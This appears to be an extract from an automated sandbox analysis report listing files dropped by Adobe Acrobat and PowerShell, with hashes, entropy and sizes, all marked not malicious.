SHA-512: | DC43D75B3B99BCE51ADB002E77198B98FEADE9FD2536F09820E6BB891D3262283C7B58F62478CD0FC32B3E456D3999A5F230F0FD301260489E7CC60B569BB61D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 298 |
Entropy (8bit): | 5.125469598198987 |
Encrypted: | false |
SSDEEP: | 6:iOK5q2PN72nKuAl9OmbnIFUtwJivZZmweJivzkwON72nKuAl9OmbjLJ:7K5vVaHAahFUtwJiZ/eJiz5OaHAaSJ |
MD5: | 8D4AA9085634531B8193DF93B600B7FA |
SHA1: | 0633A1C72A5A3503AB780F311A51C5946D639F36 |
SHA-256: | 0E563FF5CA08BD89667257983AA32C62A2D1DB5FF83811F2430EDE41C1CBC097 |
SHA-512: | 6C8B98451E86604AC48627A4F0802218598D6A5B8C45B912D76215C6D39365C2523B98395A527A4E5CDCFBA3C7477B217B47C8F937867030C65E4F9F33D49250 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 298 |
Entropy (8bit): | 5.125469598198987 |
Encrypted: | false |
SSDEEP: | 6:iOK5q2PN72nKuAl9OmbnIFUtwJivZZmweJivzkwON72nKuAl9OmbjLJ:7K5vVaHAahFUtwJiZ/eJiz5OaHAaSJ |
MD5: | 8D4AA9085634531B8193DF93B600B7FA |
SHA1: | 0633A1C72A5A3503AB780F311A51C5946D639F36 |
SHA-256: | 0E563FF5CA08BD89667257983AA32C62A2D1DB5FF83811F2430EDE41C1CBC097 |
SHA-512: | 6C8B98451E86604AC48627A4F0802218598D6A5B8C45B912D76215C6D39365C2523B98395A527A4E5CDCFBA3C7477B217B47C8F937867030C65E4F9F33D49250 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.179663057918421 |
Encrypted: | false |
SSDEEP: | 6:iOKOVT+q2PN72nKuAl9Ombzo2jMGIFUtwOc1ZmweOXTVkwON72nKuAl9Ombzo2jz:7KOVqvVaHAa8uFUtwO6/eOJ5OaHAa8RJ |
MD5: | 7B3A1FFB03BD00F4A7465EBF02628C02 |
SHA1: | 0719F2794768D6BD4DE30C774E8F9ECC89FBC73B |
SHA-256: | F6555959DB85284819D7D3ACF76E034EC986614AB46C7C6C99F0B74863E924B9 |
SHA-512: | E1D9F809CA23FCCECF65960F49231CB6FD08B00A2B6B7E4AD902A110DF2425A0F139EA2228802B9E2356ACB42B45D3685DF48057BF33750972EB2FC85360AEAD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.179663057918421 |
Encrypted: | false |
SSDEEP: | 6:iOKOVT+q2PN72nKuAl9Ombzo2jMGIFUtwOc1ZmweOXTVkwON72nKuAl9Ombzo2jz:7KOVqvVaHAa8uFUtwO6/eOJ5OaHAa8RJ |
MD5: | 7B3A1FFB03BD00F4A7465EBF02628C02 |
SHA1: | 0719F2794768D6BD4DE30C774E8F9ECC89FBC73B |
SHA-256: | F6555959DB85284819D7D3ACF76E034EC986614AB46C7C6C99F0B74863E924B9 |
SHA-512: | E1D9F809CA23FCCECF65960F49231CB6FD08B00A2B6B7E4AD902A110DF2425A0F139EA2228802B9E2356ACB42B45D3685DF48057BF33750972EB2FC85360AEAD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.953999074856088 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq1pShsBdOg2HHcaq3QYiubcP7E4T3y:Y2sRdsypSydMHm3QYhbA7nby |
MD5: | 075A694CAA0CBDE34ED69555CCD2DDD4 |
SHA1: | 343A5C3B2D79BC576B5A319F74138D775B7486FE |
SHA-256: | 04332A1CB60A010BE1E5D8CE93FF74C1500C32F46715895AA52A8D4C481BE07E |
SHA-512: | B6FF665E26477B8EA210B7D8B0AB9C81504542D87284967669951E1ABA07B7A7570B6723B97CC0443AF0E0353C01886341ABAF7A3D78EE09ED7FABF85D3CCB9D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\b90c36be-00fa-4d24-a49c-3abf5f9928e0.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.953999074856088 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq1pShsBdOg2HHcaq3QYiubcP7E4T3y:Y2sRdsypSydMHm3QYhbA7nby |
MD5: | 075A694CAA0CBDE34ED69555CCD2DDD4 |
SHA1: | 343A5C3B2D79BC576B5A319F74138D775B7486FE |
SHA-256: | 04332A1CB60A010BE1E5D8CE93FF74C1500C32F46715895AA52A8D4C481BE07E |
SHA-512: | B6FF665E26477B8EA210B7D8B0AB9C81504542D87284967669951E1ABA07B7A7570B6723B97CC0443AF0E0353C01886341ABAF7A3D78EE09ED7FABF85D3CCB9D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5449 |
Entropy (8bit): | 5.251856330495474 |
Encrypted: | false |
SSDEEP: | 96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE75DlH:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhb |
MD5: | 98AA045081330154200DF4781B4AF506 |
SHA1: | 180983EF6F9EDA343CEB4F76A1A70D9359073FC8 |
SHA-256: | 2DCC4C6F4C34119098527323D4B9EC7B75DF192F39B4896C58AB7FD473296C22 |
SHA-512: | 348F5C427F904B7A409C136703EC7C6A400E4442B4EE0979DD28D39695645740B3BA9AD69E9C778124A526EC9BFAEA86EFCF55B13653CD68F14FE9E28C5D41CB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.1741616807262325 |
Encrypted: | false |
SSDEEP: | 6:iOKYQ+q2PN72nKuAl9OmbzNMxIFUtwYeXZmweDEtVkwON72nKuAl9OmbzNMFLJ:7K2vVaHAa8jFUtw1/eU5OaHAa84J |
MD5: | C9E34FBA354804AB3A5D9C24F7227A42 |
SHA1: | 74A0B527AE74A0CD2676954D127652C22D6FA598 |
SHA-256: | 25948D77E6D64DBA7951849656CD88A701BF913F4AD850B853AFEB5E59BEBEBF |
SHA-512: | 7EBF0C5FC8F82EBB670840F5FE4E3B549DDD491360CA38936AD819F38250DD67A24BE47CBE69965831C0971D558362DD5CCF284F6AF55BEAD283C323469F1DCC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.1741616807262325 |
Encrypted: | false |
SSDEEP: | 6:iOKYQ+q2PN72nKuAl9OmbzNMxIFUtwYeXZmweDEtVkwON72nKuAl9OmbzNMFLJ:7K2vVaHAa8jFUtw1/eU5OaHAa84J |
MD5: | C9E34FBA354804AB3A5D9C24F7227A42 |
SHA1: | 74A0B527AE74A0CD2676954D127652C22D6FA598 |
SHA-256: | 25948D77E6D64DBA7951849656CD88A701BF913F4AD850B853AFEB5E59BEBEBF |
SHA-512: | 7EBF0C5FC8F82EBB670840F5FE4E3B549DDD491360CA38936AD819F38250DD67A24BE47CBE69965831C0971D558362DD5CCF284F6AF55BEAD283C323469F1DCC |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444807367163343 |
Encrypted: | false |
SSDEEP: | 384:Setci5tNiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:Bms3OazzU89UTTgUL |
MD5: | 768714D9A7BCE9824F77E1421AD7F208 |
SHA1: | 57821457AF8E115D2AA3037DAFF449AE8EA875D8 |
SHA-256: | 207F68495AB8E3FF2FAAB9937ABAF962F6F6254D56549933195E1BAA5B659766 |
SHA-512: | 82919A40B6DDA451671F26911065F3F6B5F7BCA7AFD1CBA8040029DD09F7D39F1E77DA547458ACF8B4C4E67A735480415A927CAA86D1869D3FA769B5281AB2FE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2129558282551476 |
Encrypted: | false |
SSDEEP: | 24:7+tcqenuwKdqLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9z:7MUnCdqPmFTIF3XmHjBoGGR+jMz+LhF |
MD5: | 43155FB3F6BA7F43E95B46CCC20B70BA |
SHA1: | 3CE314A7208ADD84636EE463DCE761403630A3A8 |
SHA-256: | 5DB3B96EDBF2D4A4D1DCA603DACA927CFFABBC0DCF5932D175D3C02073392C03 |
SHA-512: | 4213ADF874865E7FDFF2D2AD79B0D627CA78FCF11B1531F4D2BB22790491A34AE768802A09744C5BB054F45DED4E32B6EEE2E3D7AA4F8810A4B64B1F73B8C04F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7126816513205103 |
Encrypted: | false |
SSDEEP: | 3:kkFkly3KRllltfllXlE/HT8kkDJ1NNX8RolJuRdxLlGB9lQRYwpDdt:kKr3CteT8f7NMa8RdWBwRd |
MD5: | 6773B6B4EB13619EB0CDB556DD743B15 |
SHA1: | 605241503CC73B1511BCD7941895CDAF445AD412 |
SHA-256: | 679855350E8747FD56AB9763D881B69AE947E79165FB7F7A6E96DDD8646856FE |
SHA-512: | 60B2BC5A12BC72F0C5F0D41F807F7D15CC78FB65F2E8977DC5F66519B37DAA594C2896FB722EB0F6000B0B068D2B9A2C40DD460DE80FB423DFD314423E247940 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.1321959448363517 |
Encrypted: | false |
SSDEEP: | 6:kKxgPL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:uPiDnLNkPlE99SNxAhUe/3 |
MD5: | BC4CA58BE730AFE884116DC9CCE46A6D |
SHA1: | 23FF87269AA3D99B2A6685FAE9B70B66487AE92F |
SHA-256: | A8E3BBE63CA7BBE7B1403DA05618B381CC448B79AB0BAAF4588308E585D56A01 |
SHA-512: | 9113EF485B7FA68C4A1093BFD9844CCDD9448EA8529ED91341D6B28C663AC0643E5FC16CB10EEEBA84E86CE8079F2FA8CE5D967638A9924162CCF9491F86FE54 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2145 |
Entropy (8bit): | 5.072031774322975 |
Encrypted: | false |
SSDEEP: | 48:YW/pOrY21a4hbtC3dci5WXjJ0vS/PbMa7:wB0tWTJDnbMo |
MD5: | A452D89FDCE54BE6692EA9420E6BE437 |
SHA1: | 8E6CF1F3F1B9949E4DBDEE28B126260A2818E34A |
SHA-256: | 21285C50FA1E9A5330702FE6A496C893DCB32871D781EBA1C7815954BB768A61 |
SHA-512: | 9DE7726861F51B69F70CE52668782FC663A6C7AB709DCA8A3892324471A0FF1FA04327822DA9CF082D4F0C6FCAA4DEB577034913E3D305B77F2DE82948362810 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.145968371370601 |
Encrypted: | false |
SSDEEP: | 24:TLhx/XYKQvGJF7ursDlxRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUud5:TFl2GL7msDl9Xc+XcGNFlRYIX2v3kGlD |
MD5: | 2EACDBDD7048CE1266098C7269B65524 |
SHA1: | F413B2F5738F57976DAE59DC8E682CEE4E68A350 |
SHA-256: | C6833F6A1CA9619E831E4F89A74CDBE50B37CCACB3E33260A5F235B09F15268B |
SHA-512: | 6D62127B8AA9211D73EBEF01B78D4F2B69362FD9267B8E36703CF4BDA7F038DBE3958F94FD2EED90FD4B424FB98BAC803C5A495C3410E3DEC1D595A08C48FCC7 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.552851134858841 |
Encrypted: | false |
SSDEEP: | 24:7+tUlxUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLux+JqLxx/Xr:7MUliXc+XcGNFlRYIX2vZJqVl2GL7ms1 |
MD5: | CECE9A6B66DACF7FC1EE857A2F2D6696 |
SHA1: | 9C063A573B69017E6EF1E63DEBFFB1898EDC98D2 |
SHA-256: | C459291CABA04EDB4142DEF027EFF2D3D97E24B4A26520308721F7FF59827DB5 |
SHA-512: | 0144DB9E08D5A880144DAAC809E9334AC979FE2F881E13760D93E948EF1515385682C296FFA85503F8A9610C896344E11EA6FB0780FB93EFA1FD5D00F3C9984D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgJ4SevnTTmt3NjXSpZOa9yJuhSYyu:6a6TZ44ADEJtNjXoZOvJuhSK |
MD5: | 57B1C5C3BA204653559AFC86E69E718F |
SHA1: | 831D3986107CBE064CD456D3275F48D7103DD2DE |
SHA-256: | 9D51FCB1329F043F315F4976EAC067CF82E7BC1E97F00747137EFBE01EF908A8 |
SHA-512: | 29A4F1C3807E25BD823A559289975412D37304C87276F42D4460CACB32A02BF9560BD047FC0A281DF14A1A58D8CF591E5675B6DFFCBDE3EE52A4F224397B3575 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1510207563435464 |
Encrypted: | false |
SSDEEP: | 3:Nlllullkv/tz:NllU+v/ |
MD5: | 6442F277E58B3984BA5EEE0C15C0C6AD |
SHA1: | 5343ADC2E7F102EC8FB6A101508730898CB14F57 |
SHA-256: | 36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D |
SHA-512: | F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.513199765407527 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K84jClBdKCH:Qw946cPbiOxDlbYnuRKTjUKw |
MD5: | 8689166681181C500479370CCF7958DF |
SHA1: | 8A881EF5DEDCCD58D02A9B55167D335703E629A3 |
SHA-256: | 973F53C57822DA81FAD11B4C3F6DDC81D72884429CB5285BBFF06A40DAD85916 |
SHA-512: | 7689604DA555806CA1D4A8A529B34C92B30175261CE70B67A06B887397BB5176984020870D7B71728594079426F6E2FB2502AF97813584FF0AED632FE1FBDEDE |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-13 04-13-28-070.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.338264912747007 |
Encrypted: | false |
SSDEEP: | 384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb |
MD5: | 128A51060103D95314048C2F32A15C66 |
SHA1: | EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB |
SHA-256: | 601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713 |
SHA-512: | 55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.3571513027854625 |
Encrypted: | false |
SSDEEP: | 384:PVhsYM5qpVB5smmk4VN8yXJMUXAa11RW61hTlRjgKTKeE8xqeTaFl7IfIF8xzYQL:9/rQ/ |
MD5: | 270E6CE81703F1CAB35E9BBBE3DA6A06 |
SHA1: | 8F03356DF866627E7B387ADFBFA3F0AFB3DDDED4 |
SHA-256: | D410BD1900201016E813C01635422A09ABC61CF22048E202F0308AED850EE30D |
SHA-512: | EB017273A47CD45584DBAA824AA4E652AE09DD790B0050A1615BDE8508B5A4CBAA1C484AC084959BD56A3DE5DE27A1EACEC9F2A5A40F46396465147814C91532 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.398956941133226 |
Encrypted: | false |
SSDEEP: | 192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcb3cbqI57cbKy:V3fOCIdJDea5py |
